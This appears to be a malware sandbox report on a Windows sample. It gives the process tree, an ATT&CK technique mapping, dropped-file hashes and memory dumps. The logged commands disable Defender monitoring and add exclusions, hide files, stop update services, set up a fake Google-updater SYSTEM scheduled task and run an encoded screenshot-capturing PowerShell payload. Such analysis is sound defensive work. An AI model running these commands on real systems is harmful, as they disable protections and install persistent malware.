- - C:\Windows\system32\attrib.exe
    attrib +h +s C:\Users\Admin\AppData\Local\Temp\loader.exe
    3⤵
    - Views/modifies file attributes
    PID:1032
- - C:\Windows\System32\Wbem\wmic.exe
    wmic os get Caption
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1876
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\loader.exe
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2596
- - C:\Windows\system32\attrib.exe
    attrib +h +s C:\Users\Admin\AppData\Roaming\Microsoft\Protect\WindowsSecurity.exe
    3⤵
    - Views/modifies file attributes
    PID:1288
- - C:\Windows\System32\Wbem\wmic.exe
    wmic cpu get Name
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2432
- - C:\Windows\System32\Wbem\wmic.exe
    wmic path win32_VideoController get name
    3⤵
    - Detects videocard installed
    PID:1140
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:3732
- - C:\Windows\System32\Wbem\wmic.exe
    wmic csproduct get UUID
    3⤵
    PID:3716
- - C:\Windows\system32\attrib.exe
    attrib -r C:\Windows\System32\drivers\etc\hosts
    3⤵
    - Drops file in Drivers directory
    - Views/modifies file attributes
    PID:1084
- - C:\Windows\system32\attrib.exe
    attrib +r C:\Windows\System32\drivers\etc\hosts
    3⤵
    - Drops file in Drivers directory
    - Views/modifies file attributes
    PID:5068
- - C:\Windows\system32\netsh.exe
    netsh wlan show profiles
    3⤵
    - Event Triggered Execution: Netsh Helper DLL
    - System Network Configuration Discovery: Wi-Fi Discovery
    PID:4448
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2332
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\0drkbexr\0drkbexr.cmdline"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4424
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB8FF.tmp" "c:\Users\Admin\AppData\Local\Temp\0drkbexr\CSCC87C0D4F40DA4DC191D9F2D642A2B336.TMP"
        5⤵
        
        PID:2736
- - C:\Users\Admin\AppData\Local\Temp\.exe
    C:\Users\Admin\AppData\Local\Temp\.exe
    3⤵
    - Suspicious use of NtCreateUserProcessOtherParentProcess
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Drops file in Program Files directory
    - Suspicious use of WriteProcessMemory
    PID:904
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:3408
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:228
- - C:\Windows\System32\sc.exe
    sc stop UsoSvc
    3⤵
    - Launches sc.exe
    PID:1420
- - C:\Windows\System32\sc.exe
    sc stop WaaSMedicSvc
    3⤵
    - Launches sc.exe
    PID:4540
- - C:\Windows\System32\sc.exe
    sc stop wuauserv
    3⤵
    - Launches sc.exe
    PID:2964
- - C:\Windows\System32\sc.exe
    sc stop bits
    3⤵
    - Launches sc.exe
    PID:1532
- - C:\Windows\System32\sc.exe
    sc stop dosvc
    3⤵
    - Launches sc.exe
    PID:5108
- C:\Windows\System32\dialer.exe
  C:\Windows\System32\dialer.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2148
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#zfgfynpn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:3088
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:5044
- C:\Windows\System32\schtasks.exe
  C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"
  2⤵
  PID:4872
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:2208
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  PID:3752
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:4936
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
  2⤵
  PID:2984
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:2396
- - C:\Windows\System32\sc.exe
    sc stop UsoSvc
    3⤵
    - Launches sc.exe
    PID:4124
- - C:\Windows\System32\sc.exe
    sc stop WaaSMedicSvc
    3⤵
    - Launches sc.exe
    PID:1760
- - C:\Windows\System32\sc.exe
    sc stop wuauserv
    3⤵
    - Launches sc.exe
    PID:680
- - C:\Windows\System32\sc.exe
    sc stop bits
    3⤵
    - Launches sc.exe
    PID:4020
- - C:\Windows\System32\sc.exe
    sc stop dosvc
    3⤵
    - Launches sc.exe
    PID:4568
- C:\Windows\System32\dialer.exe
  C:\Windows\System32\dialer.exe
  2⤵
  PID:2608
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#zfgfynpn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  PID:388
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:3008
- C:\Windows\System32\dialer.exe
  C:\Windows\System32\dialer.exe
  2⤵
  PID:2796
- C:\Windows\System32\dialer.exe
  C:\Windows\System32\dialer.exe
  2⤵
  PID:3472

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
1⤵
PID:3436

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
1⤵
PID:3444

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3804

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3880

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UdkSvcGroup -s UdkUserSvc
1⤵
PID:3924

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:3932

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}
1⤵
PID:4276

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k osprivacy -p -s camsvc
1⤵
PID:4384

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
1⤵
PID:5016

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
1⤵
PID:4232

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
1⤵
PID:4788

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
1⤵
- Modifies data under HKEY_USERS
PID:4316

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:1832

C:\Windows\system32\SppExtComObj.exe
C:\Windows\system32\SppExtComObj.exe -Embedding
1⤵
PID:2144

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
1⤵
PID:2124

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:3116

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
1⤵
PID:4740

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k WerSvcGroup
1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
PID:2128
- C:\Windows\system32\WerFault.exe
  C:\Windows\system32\WerFault.exe -pss -s 448 -p 4020 -ip 4020
  2⤵
  - Suspicious use of NtCreateProcessExOtherParentProcess
  PID:4068

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

System Services

T1569

Service Execution

T1569.002

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Impair Defenses

T1562

Indicator Removal

T1070

Clear Windows Event Logs

T1070.001

Modify Registry

T1112

Obfuscated Files or Information

T1027

Command Obfuscation

T1027.010

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Query Registry

T1012

System Information Discovery

T1082

System Network Configuration Discovery

T1016

Wi-Fi Discovery

T1016.002

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
627073ee3ca9676911bee35548eff2b8

SHA1
4c4b68c65e2cab9864b51167d710aa29ebdcff2e

SHA256
85b280a39fc31ba1e15fb06102a05b8405ff3b82feb181d4170f04e466dd647c

SHA512
3c5f6c03e253b83c57e8d6f0334187dbdcdf4fa549eecd36cbc1322dca6d3ca891dc6a019c49ec2eafb88f82d0434299c31e4dfaab123acb42e0546218f311fb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
1a9fa92a4f2e2ec9e244d43a6a4f8fb9

SHA1
9910190edfaccece1dfcc1d92e357772f5dae8f7

SHA256
0ee052d5333fd5fd86bc84856fec98e045f077a7ac8051651bf7c521b9706888

SHA512
5d2361476fa22200e6f83883efe7dcb8c3fe7dae8d56e04e28a36e9ae1270c327b6aa161d92b239593da7661289d002c574446ecfd6bd19928209aae25e3ef64

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
d0a4a3b9a52b8fe3b019f6cd0ef3dad6

SHA1
fed70ce7834c3b97edbd078eccda1e5effa527cd

SHA256
21942e513f223fdad778348fbb20617dd29f986bccd87824c0ae7f15649f3f31

SHA512
1a66f837b4e7fb6346d0500aeacb44902fb8a239bce23416271263eba46fddae58a17075e188ae43eb516c841e02c87e32ebd73256c7cc2c0713d00c35f1761b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
190b28f40c0edd3cc08d0fd3aca4779a

SHA1
425b98532b6a18aa2baece47605f1cf6c8cfbd11

SHA256
8a2c650430d93841587c726ffff72fb64e02d2da24c9d8df17e835d1124d53ce

SHA512
8d1c7a20b324937face0e0c9249d635b3dfcfbad004928de731baf0d72df9ee64fb3f482451d20eb55fa0364311a9806e9d49ae4eafca38d6b58a988f8807110

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
dfd6ac138fd76606a84ed487483e01b7

SHA1
edc02d6e52547b99c415c3a3db83247adf131150

SHA256
5908797ff24f2dd5bf0249d64f0de1fb14a3e3ae8455af3ffd49e6c9145e5ca2

SHA512
16c95dcb012203f23229cf5add00767397f810146db0bca94feff46ea29809824cb2876daad902ceb2c4b8926eb910b2ddb3b559e756c9ee286bfa51a1a02f81

Download Submit
C:\Users\Admin\AppData\Local\Temp\0drkbexr\0drkbexr.dll

Filesize
4KB

MD5
3835a66eaf32f6976fe4cb6e8f48f6a3

SHA1
5b05654f79df69f46b55c0c3968288d844fbdf36

SHA256
66447fe0320c4401a83ed4648917a085493ca34d975b975f9db3ec6f7214e92b

SHA512
dbf7a5d00d660bc0a66a803d7494e3732e10478aab73d7cf496349bbc65de9a4c4655ea445d2cfee67c2c8c927d0ff03cd1a0582b99ad3b09e1232876be4b613

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESB8FF.tmp

Filesize
1KB

MD5
c099023a93c8641434585a6ff5f1c84d

SHA1
a0bb8a0da6fb2e85340cb7bb3e13927bab880164

SHA256
a223579d5c1aec53de66bdff0dc0d4ac6870ac619c6200ee0d43c18eb64a1443

SHA512
fce885ba0ee49a55d3ef22e3e85d72f357a4785b0b8ef31ecb1771564a06f329984b8f0851fecece778916ee0ca7d11cc7a77753431fa917fd540297c1e8e9f9

Download Submit
C:\Users\Admin\AppData\Local\Temp\SE0jQYTGq1\Display (1).png

Filesize
410KB

MD5
503e788ea81b0a330ed24ed6f6c03104

SHA1
c3df74a10e44eb99cc3c76abb9485c7b544a0215

SHA256
dd636edb4d7a884b6e0e040afd64eaf188b350c36276a62efacec8c2d8862478

SHA512
f1e91c045fe49519dd3bb42c6ce9f8b81a279a8fa497f284485c71df05e787627df1233212f4a6cbcbcc33ff6a490c75794389e038e7fa8589e191e82b31107b

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_bnqjsrcr.uzc.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Protect\WindowsSecurity.exe

Filesize
14.4MB

MD5
0b36da64b85e5abae7a93017d46dcce1

SHA1
40506f88be2a8f9fc03083f8d934b58fe22c3ae5

SHA256
0ca594179661c1ec0c7ec592be1995a14e2b0d13d0bd7a3420cb49e6254d2903

SHA512
a0a8fbb2127451ae7c776fff5e2d26d1d8e035527010f7f91a2904a76edfcaa054bf5becddc29fbe98e49bd211f8ae1f94c884e8e92c9b62984313cf843d9572

Download Submit
C:\Windows\System32\drivers\etc\hosts

Filesize
2KB

MD5
6e2386469072b80f18d5722d07afdc0b

SHA1
032d13e364833d7276fcab8a5b2759e79182880f

SHA256
ade1813ae70d7da0bfe63d61af8a4927ed12a0f237b79ce1ac3401c0646f6075

SHA512
e6b96f303935f2bbc76f6723660b757d7f3001e1b13575639fb62d68a734b4ce8c833b991b2d39db3431611dc2cacde879da1aecb556b23c0d78f5ee67967acb

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
4KB

MD5
dbbd2d4458d7e8094846420da595dfc3

SHA1
267cb47b904f14a519d2bd73abfdb30e1a06e1a6

SHA256
e27390d57580e3dfba07bec3d8e430203bbc91e90f6937079b3fd52abc721bd4

SHA512
480e7ca865b811f79f35fcfe7a9ac0280b48d1f9459873d18f000db55c72d53345cf3a10075c1ac407439545f699ce2a7bef38b00b4e19439edf384b00045531

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
f2dd68ab8e611f0143c6ad176f223ae9

SHA1
30f580175773f251a9572fe757de6eaef6844abc

SHA256
f935809085e90f8fc2c003afb46e81de28f3312ec097cf46f2bdc2488cb893e7

SHA512
f664b850c2fc6773e48171be5c180d8bc5c3a27945f5e6604605006a3c93e0bf3a516b647d6411a4d6b75bdf0a5e15b4f3621bf5702bbc3c46f9b517cb69dd04

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\0drkbexr\0drkbexr.0.cs

Filesize
1004B

MD5
c76055a0388b713a1eabe16130684dc3

SHA1
ee11e84cf41d8a43340f7102e17660072906c402

SHA256
8a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7

SHA512
22d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\0drkbexr\0drkbexr.cmdline

Filesize
607B

MD5
0cb6a0a46f890cb5e89c9942033e5be3

SHA1
b2add611d7f1ec8dc6977188665b3c356b30f9dd

SHA256
f1824d21334447b8be73f44b0469a78ff95c1fcff27948afead2f7cbd4cf86b4

SHA512
9f1735e9c9ddbd24b6281e1be7595494aadd1da114f4bd4f5651ad530b21053ef50a592668661c6b7312458e4133e98884bbdd5a88797c7df97c54730a5becc2

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\0drkbexr\CSCC87C0D4F40DA4DC191D9F2D642A2B336.TMP

Filesize
652B

MD5
84b1ee77fac8e8f23bbfaff94ee2f0c6

SHA1
da6651a45ae76475c0fef29496f2f34bc6b22c75

SHA256
bbcf739c7502c331a477c510f307bd895420ceefcf562a24d716b174ff248fa9

SHA512
04655d89328730f4539e61903c9825d63f909a3ca734663833e411501b9cc9f609ac5d24dfc74bd40a6c456f22dfb9c93fdd5c849a1c541423f6455d182e0dff

Download Submit
memory/388-602-0x000001F3AD1F0000-0x000001F3AD2A3000-memory.dmp

Filesize
716KB

Download
memory/428-91-0x00007FFB3AF10000-0x00007FFB3AF20000-memory.dmp

Filesize
64KB

Download
memory/428-90-0x0000026ABBE20000-0x0000026ABBE47000-memory.dmp

Filesize
156KB

Download
memory/500-98-0x00007FFB3AF10000-0x00007FFB3AF20000-memory.dmp

Filesize
64KB

Download
memory/500-97-0x00000200CE540000-0x00000200CE567000-memory.dmp

Filesize
156KB

Download
memory/624-82-0x000002716E680000-0x000002716E6A7000-memory.dmp

Filesize
156KB

Download
memory/624-80-0x000002716E650000-0x000002716E671000-memory.dmp

Filesize
132KB

Download
memory/624-83-0x00007FFB3AF10000-0x00007FFB3AF20000-memory.dmp

Filesize
64KB

Download
memory/688-86-0x00007FFB3AF10000-0x00007FFB3AF20000-memory.dmp

Filesize
64KB

Download
memory/688-85-0x0000026394570000-0x0000026394597000-memory.dmp

Filesize
156KB

Download
memory/904-66-0x00007FF7AAE40000-0x00007FF7AE6F5000-memory.dmp

Filesize
56.7MB

Download
memory/908-141-0x000001B759490000-0x000001B7594B7000-memory.dmp

Filesize
156KB

Download
memory/908-144-0x00007FFB3AF10000-0x00007FFB3AF20000-memory.dmp

Filesize
64KB

Download
memory/980-93-0x0000020A1E2C0000-0x0000020A1E2E7000-memory.dmp

Filesize
156KB

Download
memory/980-94-0x00007FFB3AF10000-0x00007FFB3AF20000-memory.dmp

Filesize
64KB

Download
memory/1044-147-0x00007FFB3AF10000-0x00007FFB3AF20000-memory.dmp

Filesize
64KB

Download
memory/1044-146-0x000001ADAF360000-0x000001ADAF387000-memory.dmp

Filesize
156KB

Download
memory/1068-122-0x00007FFB3AF10000-0x00007FFB3AF20000-memory.dmp

Filesize
64KB

Download
memory/1068-121-0x00000217C35D0000-0x00000217C35F7000-memory.dmp

Filesize
156KB

Download
memory/1180-124-0x000002209E6E0000-0x000002209E707000-memory.dmp

Filesize
156KB

Download
memory/1180-125-0x00007FFB3AF10000-0x00007FFB3AF20000-memory.dmp

Filesize
64KB

Download
memory/1192-128-0x00007FFB3AF10000-0x00007FFB3AF20000-memory.dmp

Filesize
64KB

Download
memory/1192-127-0x000002B843A60000-0x000002B843A87000-memory.dmp

Filesize
156KB

Download
memory/1248-130-0x000002AA4A750000-0x000002AA4A777000-memory.dmp

Filesize
156KB

Download
